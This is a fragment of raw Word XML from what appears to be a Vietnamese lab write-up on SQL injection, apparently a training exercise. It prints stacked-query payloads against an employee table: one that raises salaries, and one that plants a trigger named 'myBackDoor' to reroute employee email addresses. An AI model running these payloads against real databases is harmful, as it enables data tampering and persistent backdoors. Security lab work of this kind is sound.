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70DD2" w14:textId="2B86D6D5" w:rsidR="00BA5378" w:rsidRDefault="00E60A80">
      <w:r>
        <w:t xml:space="preserve">Kịch bản: Tương tự các câu trên ta cũng có câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60A80">
        <w:t>select userid, password, ssn, salary, email from employee where userid=101; update employee set salary=10000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F67E35" wp14:editId="5D4AC4F0">
            <wp:extent cx="3109844" cy="174928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8458" cy="175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84A4" w14:textId="13FE7B03" w:rsidR="00E60A80" w:rsidRDefault="00E60A80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để tạo Trigger vào DB trên ta thực hiện câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>REATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C1D99D" w14:textId="2E4812B8" w:rsidR="001352E0" w:rsidRDefault="001352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Câu lệnh thực thi lúc này cũng tương tự: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60A80">
        <w:t xml:space="preserve">101; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>REATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E02F7E2" w14:textId="1A0457BB" w:rsidR="006C2403" w:rsidRDefault="006C2403">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33A6522A" wp14:editId="33527687">
            <wp:extent cx="3788354" cy="2130949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801" cy="213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D5"/>
    <w:rsid w:val="001352E0"/>
    <w:rsid w:val="00695ED5"/>
    <w:rsid w:val="006C2403"/>
    <w:rsid w:val="00BA5378"/>
    <w:rsid w:val="00E6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8823"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AE509C7E-463E-44DE-8F64-F299D357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2020-05-25T03:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-25T03:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>